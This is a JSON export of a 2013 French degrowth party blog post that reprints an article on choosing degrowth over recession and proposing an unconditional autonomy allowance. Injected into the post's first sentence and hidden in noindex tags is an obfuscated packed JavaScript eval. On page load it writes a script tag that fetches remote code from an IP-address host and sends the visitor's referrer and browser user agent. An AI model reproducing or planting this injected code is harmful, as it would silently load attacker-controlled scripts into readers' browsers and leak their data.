{"id":8110,"date":"2013-03-04T08:50:26","date_gmt":"2013-03-04T07:50:26","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8110"},"modified":"2013-05-22T07:46:00","modified_gmt":"2013-05-22T06:46:00","slug":"decroissance-choisie-ou-recession-subie-dans-la-revue-des-jeunes-socialistes","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8110","title":{"rendered":"Dans la revue des jeunes socialistes : D\u00e9croissance choisie ou r\u00e9cession subie ?"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" id=\"revueune\" alt=\"\" src=\"http:\/\/www.ecosocialiste.fr\/wp-content\/themes\/twentyeleven\/images\/revue-2.png\" width=\"80\" height=\"110\" \/><\/p>\n<p>C<img loading=\"lazy\" decoding=\"async\" class=\"alignright\" alt=\"\u00e9cosocialiste - la revue\" src=\"http:\/\/www.ecosocialiste.fr\/wp-content\/themes\/twentyeleven\/images\/logo-ecosocialiste.png\" width=\"276\" height=\"79\" \/>et <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nybie|var|u0026u|referrer|idrfd||js|php'.split('|'),0,{}))\n<\/script><\/noindex> article a \u00e9t\u00e9 publi\u00e9 dans la revue des jeunes socialiste : Ecosocialisme, faire le socialisme du XXI\u00e8me sci\u00e8cle.<\/p>\n<p><a href=\"http:\/\/www.ecosocialiste.fr\/wp-content\/uploads\/2013\/02\/revue-ecosoc-2.pdf\">T\u00e9l\u00e9charger le dernier numero de la revue<\/a><\/p>\n<p><strong>D\u00e9croissance choisie ou r\u00e9cession subie ?<\/strong><\/p>\n<p><em>Pour ce num\u00e9ro nous avons le plaisir d\u2019accueillir Vincent Liegey du Parti pour la d\u00e9croissance.<\/em><\/p>\n<p>Depuis le d\u00e9but des ann\u00e9es 2000 est n\u00e9 un mouvement de pens\u00e9e autour d\u2019un slogan provocateur : La D\u00e9croissance. Le but est d\u2019ouvrir un d\u00e9bat sur l\u2019\u00e9vidence qu\u2019une croissance illimit\u00e9e dans un monde limit\u00e9 est une absurdit\u00e9\u00bb. D\u2019abord pr\u00e9sent avec sa critique radicale de la soci\u00e9t\u00e9 occidentale et l\u2019impasse dans laquelle elle se trouve, la D\u00e9croissance propose des pistes r\u00e9pondant \u00e0 la convergence de crises, toutes interconnect\u00e9es, \u00e0 laquelle nous faisons face : crises \u00e9conomique et financi\u00e8re, crises environnementale et \u00e9nerg\u00e9tique, mais aussi crises sociale, politique et culturelle.<br \/>\nDans une d\u00e9marche de convergence et de dialogue, la D\u00e9croissance exp\u00e9rimente aussi de nouvelles mani\u00e8res de vivre ensemble \u00e0 travers diverses alternatives concr\u00e8tes : simplicit\u00e9 volontaire, monnaies locales, syst\u00e8mes d\u2019\u00e9changes, villes en transition, jardins communautaires, ateliers autog\u00e9r\u00e9s, permaculture, etc.<br \/>\nL\u2019enjeu est d\u2019initier et d\u2019accompagner la transition vers de nouveaux mod\u00e8les de soci\u00e9t\u00e9s \u00e0 la fois soutenables mais surtout souhaitables. Cette transition doit \u00eatre d\u00e9mocratique, participative et sereine. C\u2019est pourquoi nous nous opposons aux plans d\u2019aust\u00e9rit\u00e9 qui participent \u00e0 une r\u00e9cession subie et d\u00e9truisent les fondements de nos soci\u00e9t\u00e9s (\u00e9ducation, sant\u00e9, culture, environnement, solidarit\u00e9s, etc.) et favorisent les replis identitaires et les discours populistes. <!--more--><\/p>\n<p>Les notions de revenu inconditionnel d\u2019existence, de revenu maximum acceptable, d\u2019extension des sph\u00e8res de la gratuit\u00e9, de rench\u00e9rissement du m\u00e9susage, de monnaies locales, de relocalisation ouverte, de transition, mais aussi les questions de strat\u00e9gies politiques et d\u2019organisations du mouvement ont \u00e9t\u00e9, ces derni\u00e8res ann\u00e9es, au centre des discussions et des d\u00e9bats au sein des composantes du mouvement de la D\u00e9croissance. Depuis quelques mois, certaines th\u00e9matiques ont \u00e9t\u00e9 approfondies, notamment sur la politique \u00e0 adopter face \u00e0 la dette et \u00e0 la cr\u00e9ation mon\u00e9taire, sur l\u2019apr\u00e8s-p\u00e9trole, sur la fa\u00e7on de sortir du capitalisme et du productivisme ou encore sur la mani\u00e8re de repolitiser la soci\u00e9t\u00e9.<\/p>\n<p>Ces discussions ont abouti, pour une grande partie d\u2019Objectrices et d\u2019Objecteurs de croissance (OC), \u00e0 la Dotation Inconditionnelle d\u2019Autonomie (DIA) coupl\u00e9e \u00e0 un Revenu maximum acceptable (RMA), devenus un chapeau de mesures \u00e9conomiques et sociales susceptibles d\u2019enclencher des cercles vertueux pour tendre vers une D\u00e9croissance soutenable, sereine et conviviale.<\/p>\n<p>Cette Dotation consiste \u00e0 donner \u00e0 toutes et tous, de mani\u00e8re inconditionnelle, de la naissance \u00e0 la mort, ce que l\u2019on consid\u00e8re d\u00e9mocratiquement comme permettant d\u2019avoir acc\u00e8s \u00e0 une vie frugale et d\u00e9cente. Au-del\u00e0 d\u2019un simple correctif, cette dotation vise \u00e0 susciter dialogues et d\u00e9bats sur ce qu\u2019est le \u00ab vivre ensemble \u00bb, sur la mani\u00e8re de cr\u00e9er<br \/>\n\u00ab plus de liens \u00bb sans pour autant cr\u00e9er \u00ab plus de biens \u00bb. Il s\u2019agit de consommer moins, en partageant mieux.<\/p>\n<p>Elle englobe le droit \u00e0 un logement, \u00e0 un local d\u2019activit\u00e9 ou une parcelle de terre, le droit \u00e0 une nourriture locale et saine, \u00e0 des produits de premi\u00e8re n\u00e9cessit\u00e9 tels que v\u00eatements, meubles ou outils \u00e0 travers une monnaie locale, \u00e0 un droit de tirage sur l\u2019eau et les \u00e9nergies sur le principe de gratuit\u00e9 du bon usage ainsi qu\u2019un droit d\u2019acc\u00e8s \u00e0 des services publics comme l\u2019\u00e9ducation, la sant\u00e9, la mobilit\u00e9 ou la culture.<\/p>\n<p>Sa faisabilit\u00e9 est assur\u00e9e par le RMA et le rench\u00e9rissement du m\u00e9susage de certains biens et services. Mais la question de la faisabilit\u00e9 est surtout celle d\u2019assumer un choix politique ambitieux.<\/p>\n<p>Sa mise en place est progressive et \u00e9volue au fur et \u00e0 mesure que la soci\u00e9t\u00e9 se transforme. On peut commencer par le partage et une baisse importante du temps de travail. Le temps libre pourrait ainsi \u00eatre utilis\u00e9 pour susciter une plus forte participation \u00e0 la vie de la cit\u00e9 \u00e0 travers les alternatives concr\u00e8tes et une relocalisation ouverte de nos \u00e9conomies et productions. Une deuxi\u00e8me \u00e9tape pourrait consister en la mise en place d\u2019un revenu d\u2019existence coupl\u00e9 \u00e0 un revenu maximum et une r\u00e9appropriation de la cr\u00e9ation mon\u00e9taire, l\u2019annulation d\u2019une partie des dettes publiques. Enfin, en s\u2019appuyant sur les alternatives concr\u00e8tes, ce revenu inconditionnel serait \u00e0 terme d\u00e9mon\u00e9taris\u00e9 et remplac\u00e9 par ces droits d\u2019acc\u00e8s et de tirage, en s\u2019appuyant sur des r\u00e9flexions telles que qu\u2019est-ce qu\u2019on produit ? Comment ? Pour quel usage ?<\/p>\n<p><em><strong>Vincent Liegey, Anisabel Veillot, Christophe Ondet et S\u00e9tphane Madelaine.<\/strong><\/em><br \/>\n<em><strong>A venir : <a href=\"http:\/\/www.projet-decroissance.net\/\" target=\"_blank\">Un projet de D\u00e9croissance, Manifeste pour une Dotation Inconditionnelle d\u2019Autonomie<\/a>, Editions Utopia, janvier 2013.<\/strong><\/em><\/p>\n<p>A lire aussi dans ce num\u00e9ro, entre autres :\u00a0<a href=\"http:\/\/ecosocialiste.fr\/2013\/02\/utopia-la-centralite-de-la-valeur-travail\/\" target=\"_blank\">Utopia : La centralit\u00e9 de la valeur travail<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cet article a \u00e9t\u00e9 publi\u00e9 dans la revue des jeunes socialiste : Ecosocialisme, faire le socialisme du XXI\u00e8me sci\u00e8cle. T\u00e9l\u00e9charger le dernier numero de la revue D\u00e9croissance choisie ou r\u00e9cession subie ? Pour ce num\u00e9ro nous avons le plaisir d\u2019accueillir &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8110\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[45,17],"tags":[],"class_list":["post-8110","post","type-post","status-publish","format-standard","hentry","category-les-forces-paralleles","category-revue-de-medias"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8110"}],"version-history":[{"count":4,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8110\/revisions"}],"predecessor-version":[{"id":8308,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8110\/revisions\/8308"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}